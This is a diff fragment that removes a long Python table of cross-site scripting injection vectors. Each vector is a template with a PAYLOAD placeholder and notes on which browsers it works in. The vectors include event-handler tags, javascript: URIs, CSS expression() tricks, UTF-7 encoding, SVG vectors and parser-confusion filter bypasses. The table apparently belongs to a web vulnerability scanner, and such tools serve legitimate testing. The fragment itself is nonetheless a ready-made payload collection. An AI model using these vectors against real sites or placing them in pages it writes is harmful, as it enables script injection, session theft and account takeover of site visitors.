-	   	  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-	 	{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
-	      'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-        { 'payload':"""<TABLE BACKGROUND=javascript:PAYLOAD>""",
-          'browser':"""[O9.02]"""},
-		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<DIV STYLE="background-image: url(PAYLOAD);">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},			  
-		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<IFRAME SRC="PAYLOAD"></IFRAME>""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-        { 'payload':"""<iframe/ /onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-        { 'payload':"""<iframe/ "onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-        { 'payload':"""<iframe///////onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-        { 'payload':"""<iframe "onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-        { 'payload':"""<iframe<?php echo chr(11)?> onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-        { 'payload':"""<iframe<?php echo chr(12)?> onload=PAYLOAD></iframe>""",
-          'browser':"""Not Info"""},
-   		{ 'payload':"""<FRAMESET><FRAME SRC="PAYLOAD"></FRAMESET>""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
-  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, 			  
-		{ 'payload':"""<DIV STYLE="background-image: url(&#1;PAYLOAD)">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-   		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<IMG STYLE="X:expr/*X*/ession(PAYLOAD)">""",
-  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, 
-		{ 'payload':"""<X STYLE="X:expression(PAYLOAD)">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},			  
-   		{ 'payload':"""<STYLE TYPE="text/javascript">PAYLOAD</STYLE>""",
-		  'browser':"""[NS4]"""},
-		{ 'payload':"""<STYLE>.X{background-image:url("PAYLOAD");}</STYLE><A CLASS=X></A>""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<STYLE type="text/css">BODY{background:url("PAYLOAD")}</STYLE>""",
-  		  'browser':"""[IE6.0|NS8.1-IE]"""}, 		  
-		{ 'payload':"""<!--[if gte IE 4]>PAYLOAD<![endif]-->""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
-   		{ 'payload':"""<BASE HREF="PAYLOAD//">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=PAYLOAD></OBJECT>""",
-		  'browser':"""[O9.02]"""},
-		{ 'payload':"""a="get";b="URL(\"";c="javascript:";d="PAYLOAD\")";eval(a+b+c+d);""",
-  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
-		{ 'payload':"""<? echo('<SCR)';echo('IPT>PAYLOAD</SCRIPT>'); ?>""",
-  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
-		{ 'payload':"""<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;PAYLOAD&lt;/SCRIPT&gt;">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	 
-		{ 'payload':"""<SCRIPT SRC=http://127.0.0.1>PAYLOAD</SCRIPT>""", 
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<IMG SRC="&14;javascript:PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-        { 'payload':"""<IMG SRC="jav&#x0D;ascript:PAYLOAD">""",
-          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-        { 'payload':"""--- <IMG SRC=" &#14;  PAYLOAD">""",
-          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-        { 'payload':'''--- <IMG SRC="PAYLOAD"''',
-          'browser':"""[IE6.0|NS8.1-IE] [09.02]"""},
-        { 'payload':"""<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
-          'browser':"""[Not Info]"""},
-        { 'payload':'''--- \";PAYLOAD;//''',
-          'browser':"""[Not Info]"""},
-        { 'payload':'''<META HTTP-EQUIVo"refresh" CONTENT="0; URL=http://;URL=PAYLOAD">''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<SCRIPT <B>=PAYLOAD"></SCRIPT>""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},	 
-		{ 'payload':"""<IFRAME SRC="javascript:PAYLOAD <""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<SCRIPT>a=/X/nPAYLOAD</SCRIPT>""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<LAYER SRC="javascript:PAYLOAD></LAYER>""",
-		  'browser':"""[NS4]"""},
-		{ 'payload':"""<STYLE>li {list-style-image: url("PAYLOAD</STYLE><UL><LI>X""", 
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<DIV STYLE="background-image: url(&#1;javascript:PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-PAYLOAD+ADw-/SCRIPT+AD4-""",
-		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<a href="javascript#PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<input type="image" dynsrc="PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""&PAYLOAD">""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""&{PAYLOAD};""",
-		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<IMG SRC=&{PAYLOAD};>""",
-		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
-		{ 'payload':"""<a href="about:PAYLOAD">""",
-		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
-		{ 'payload':"""<DIV STYLE="binding: url(javascript:PAYLOAD);">""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<OBJECT classid=clsid:..." codebase="javascript:PAYLOAD">""",
-		  'browser':"""[O9.02]"""},
-		{ 'payload':"""<style><!--</style><SCRIPT>PAYLOAD//--></SCRIPT>""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""![CDATA[<!--]]<SCRIPT>PAYLOAD//--></SCRIPT>""",
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':"""<!-- -- -->PAYLOAD<!-- -- -->""",
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<xml id="X"><a><b>PAYLOAD;<b></a></xml>''',
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-		{ 'payload':'''<div datafld="b" dataformatas="html" datasrc="#PAYLOAD"></div>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:PAYLOAD">]]</C><X></xml>''',
-		  'browser':"""[IE6.0|NS8.1-IE]"""},
-        { 'payload':"""<script psy>/*<script* */alert(PAYLOAD)</script""",
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<img src=1 href=1 onerror="PAYLOAD"></img>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-    	{ 'payload':'''<audio src=1 href=1 onerror="PAYLOAD"></audio>''',
-          'browser':"""[HTML5 Injection]"""},
- 		{ 'payload':'''<video src=1 href=1 onerror="PAYLOAD"></video>''',
-          'browser':"""[HTML5 Injection]"""},
- 		{ 'payload':'''<body src=1 href=1 onerror="PAYLOAD"></body>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<image src=1 href=1 onerror="PAYLOAD"></image>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<object src=1 href=1 onerror="PAYLOAD"></object>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<script src=1 href=1 onerror="PAYLOAD"></script>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<svg onResize svg onResize="javascript:PAYLOAD"></svg onResize>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<title onPropertyChange title onPropertyChange="javascript:PAYLOAD"></title onPropertyChange>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<iframe onLoad iframe onLoad="javascript:PAYLOAD"></iframe onLoad>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onMouseEnter body onMouseEnter="javascript:PAYLOAD"></body onMouseEnter>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onFocus body onFocus="javascript:PAYLOAD"></body onFocus>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<frameset onScroll frameset onScroll="javascript:PAYLOAD"></frameset onScroll>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:PAYLOAD"></script onReadyStateChange>''',
-          'browser':"""[IE] [Chrome]"""},
- 		{ 'payload':'''<html onMouseUp html onMouseUp="javascript:PAYLOAD"></html onMouseUp>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onPropertyChange body onPropertyChange="javascript:PAYLOAD"></body onPropertyChange>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<svg onLoad svg onLoad="javascript:PAYLOAD"></svg onLoad>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onPageHide body onPageHide="javascript:PAYLOAD"></body onPageHide>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onMouseOver body onMouseOver="javascript:PAYLOAD"></body onMouseOver>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onUnload body onUnload="javascript:PAYLOAD"></body onUnload>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<body onLoad body onLoad="javascript:PAYLOAD"></body onLoad>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:PAYLOAD"></bgsound onPropertyChange>''',
-          'browser':"""[HTML5 Injection]"""},
- 		{ 'payload':'''<html onMouseLeave html onMouseLeave="javascript:PAYLOAD"></html onMouseLeave>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<html onMouseWheel html onMouseWheel="javascript:PAYLOAD"></html onMouseWheel>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<style onLoad style onLoad="javascript:PAYLOAD"></style onLoad>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:PAYLOAD"></iframe onReadyStateChange>''',
-          'browser':"""[IE] [Chrome]"""},
- 		{ 'payload':'''<body onPageShow body onPageShow="javascript:PAYLOAD"></body onPageShow>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:PAYLOAD"></style onReadyStateChange>''',
-          'browser':"""[IE] [Chrome]"""},
- 		{ 'payload':'''<frameset onFocus frameset onFocus="javascript:PAYLOAD"></frameset onFocus>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
- 		{ 'payload':'''<applet onError applet onError="javascript:PAYLOAD"></applet onError>''',
-          'browser':"""[HTML5 Injection]"""},
-       	{ 'payload':'''<marquee onStart marquee onStart="javascript:PAYLOAD"></marquee onStart>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<script onLoad script onLoad="javascript:PAYLOAD"></script onLoad>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<html onMouseOver html onMouseOver="javascript:PAYLOAD"></html onMouseOver>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.PAYLOAD"></html onMouseEnter>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:PAYLOAD"></body onBeforeUnload>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<html onMouseDown html onMouseDown="javascript:PAYLOAD"></html onMouseDown>''',
-          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
-		{ 'payload':'''<marquee onScroll marquee onScroll="javascript:PAYLOAD"></marquee onScroll>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:PAYLOAD"></xml onPropertyChange>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<frameset onBlur frameset onBlur="javascript:PAYLOAD"></frameset onBlur>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:PAYLOAD"></applet onReadyStateChange>''',
-		  'browser':"""[IE] [Chrome]"""},
-		{ 'payload':'''<svg onUnload svg onUnload="javascript:PAYLOAD"></svg onUnload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<html onMouseOut html onMouseOut="javascript:PAYLOAD"></html onMouseOut>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onMouseMove body onMouseMove="javascript:PAYLOAD"></body onMouseMove>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onResize body onResize="javascript:PAYLOAD"></body onResize>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<object onError object onError="javascript:PAYLOAD"></object onError>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onPopState body onPopState="javascript:PAYLOAD"></body onPopState>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<html onMouseMove html onMouseMove="javascript:PAYLOAD"></html onMouseMove>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<applet onerror applet onerror="javascript:PAYLOAD"></applet onerror>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onkeyup body onkeyup="javascript:PAYLOAD"></body onkeyup>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onunload body onunload="javascript:PAYLOAD"></body onunload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<iframe onload iframe onload="javascript:PAYLOAD"></iframe onload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onload body onload="javascript:PAYLOAD"></body onload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<html onmouseover html onmouseover="javascript:PAYLOAD"></html onmouseover>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<object onbeforeload object onbeforeload="javascript:PAYLOAD"></object onbeforeload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onbeforeunload body onbeforeunload="javascript:PAYLOAD"></body onbeforeunload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onfocus body onfocus="javascript:PAYLOAD"></body onfocus>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onkeydown body onkeydown="javascript:PAYLOAD"></body onkeydown>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:PAYLOAD"></iframe onbeforeload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<iframe src iframe src="javascript:PAYLOAD"></iframe src>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg onload svg onload="javascript:PAYLOAD"></svg onload>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<body onblur body onblur="javascript:PAYLOAD"></body onblur>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<form id="X" /><button form="X" formaction="javascript:PAYLOAD">X''',
-		  'browser':"""[HTML5 Injection]"""},
-		{ 'payload':'''<input onfocus=PAYLOAD autofocus>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<input onblur=PAYLOAD autofocus><input autofocus>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<video poster=javascript:PAYLOAD//''',
-		  'browser':"""[HTML5 Injection]"""},
-		{ 'payload':'''<body onscroll=PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<form id=X onforminput=PAYLOAD><input></form><button form=X onformchange=PAYLOAD>X''',
-		  'browser':"""[HTML5 Injection]"""},
-		{ 'payload':'''<video><source onerror="javascript:PAYLOAD">''',
-		  'browser':"""[Opera10.5+] [Chrome]"""},
-		{ 'payload':'''<video onerror="javascript:PAYLOAD"><source>''',
-		  'browser':"""[FF3.5+]"""},
-		{ 'payload':'''<form><button formaction="javascript:PAYLOAD">X''',
-		  'browser':"""[HTML5 Injection]"""},
-		{ 'payload':'''<body oninput=PAYLOAD><input autofocus>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<math href="javascript:PAYLOAD">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:PAYLOAD">CLICKME</maction> </math>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<frameset onload=PAYLOAD>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<table background="javascript:PAYLOAD">''',
-		  'browser':"""[Opera8|Opera10.5+] [IE6.0]"""},
-		{ 'payload':'''<!--<img src="--><img src=x onerror=PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<comment><img src="</comment><img src=x onerror=PAYLOAD)//">''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<![><img src="]><img src=x onerror=PAYLOAD//">''',
-		  'browser':"""[FF] [Opera]"""},
-		{ 'payload':'''<style><img src="</style><img src=x onerror=PAYLOAD//">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<li style=list-style:url() onerror=PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=PAYLOAD></div>''',
-		  'browser':"""[Opera10.5+]"""},
-		{ 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,PAYLOAD//#">XXX</a></body>''',
-		  'browser':"""[Opera8|Opera10.5] [IE]"""},
-		{ 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>PAYLOAD</SCRIPT>''',
-		  'browser':"""[Opera] [IE]"""},
-		{ 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(PAYLOAD)"></OBJECT>''',
-		  'browser':"""[IE9.0]"""},
-		{ 'payload':'''<b <script>alert(PAYLOAD)</script>0''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<div id="div1"><input value="``onmouseover=PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':"""<x '='foo'><x foo='><img src=x onerror=PAYLOAD//'>""",
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<div style=width:1px;filter:glow onfilterchange=PAYLOAD>x''',
-		  'browser':"""[IE]"""},
-		{ 'payload':"""<x '="foo"><x foo='><img src=x onerror=PAYLOAD//'>""",
-		  'browser':"""[IE6.0]"""},
-		{ 'payload':'''<? foo="><script>PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<! foo="><script>PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''</ foo="><script>PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<? foo="><x foo="?><script>PAYLOAD</script>">">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<% foo><x foo="%><script>PAYLOAD</script>">''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<div id=d><x xmlns="><iframe onload=PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:PAYLOAD>XXX</a>''',
-		  'browser':"""[Safari] [Chrome]"""},
-		{ 'payload':'''<img src="x` `<script>PAYLOAD</script>"` `>''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<img src onerror /" '"= alt=PAYLOAD//">''',
-		  'browser':"""[Safari]"""},
-		{ 'payload':'''<title onpropertychange=PAYLOAD></title><title title=>''',
-		  'browser':"""[IE9.0]"""},
-		{ 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=PAYLOAD></a>">''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<!--[if]><script>PAYLOAD</script -->''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<!--[if<img src=x onerror=PAYLOAD//]> -->''',
-		  'browser':"""[IE]"""},
-		{ 'payload':'''<script src="/\PAYLOAD"></script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script src="\\PAYLOAD"></script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':"""<a style="-o-link:'javascript:PAYLOAD';-o-link-source:current">X""",
-		  'browser':"""[Opera]"""},
-		{ 'payload':"""<style>p[foo=bar{}*{-o-link:'javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>""",
-		  'browser':"""[Opera]"""},
-		{ 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(PAYLOAD)%7d''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<style>@import "data:,*%7bx:expression(PAYLOAD)%7D";</style>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="PAYLOAD;">XXX</a></a><a href="javascript:PAYLOAD">XXX</a>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script>({set/**/$($){_/**/setter=$,_=PAYLOAD}}).$=eval</script>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<script>({0:#0=eval/#0#/#0#(PAYLOAD)})</script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){PAYLOAD}),x</script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('PAYLOAD')()</script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script src="#">{PAYLOAD}</script>;1''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),PAYLOAD;''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<b><script<b></b><PAYLOAD</script </b>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script<{PAYLOAD}/></script </>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<script>crypto.generateCRMFRequest('CN=0',0,0,null,'PAYLOAD',384,null,'rsa-dual-use')</script>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<script>[{'a':Object.prototype.__defineSetter__('b',function(){eval(arguments[0])}),'b':['PAYLOAD']}]</script>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:PAYLOAD"></g></svg>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><script>PAYLOAD</script></svg>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg onload="javascript:PAYLOAD" xmlns="http://www.w3.org/2000/svg"></svg>''',
-		  'browser':"""[Not Info]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:PAYLOAD"><rect width="1000" height="1000" fill="white"/></a> </svg>''',
-		  'browser':"""[FF]"""},
-		{ 'payload':'''<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("PAYLOAD#x") format("svg");} body {font: 100px "y";} </style> </head> <body>X</body> </html>''',
-		  'browser':"""[Opera 10]"""},
-		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:PAYLOAD"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='PAYLOAD'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(PAYLOAD)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:PAYLOAD"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3EPAYLOAD%3C/script%3E"/> </svg>''',
-		  'browser':"""[Opera] [FF]"""},
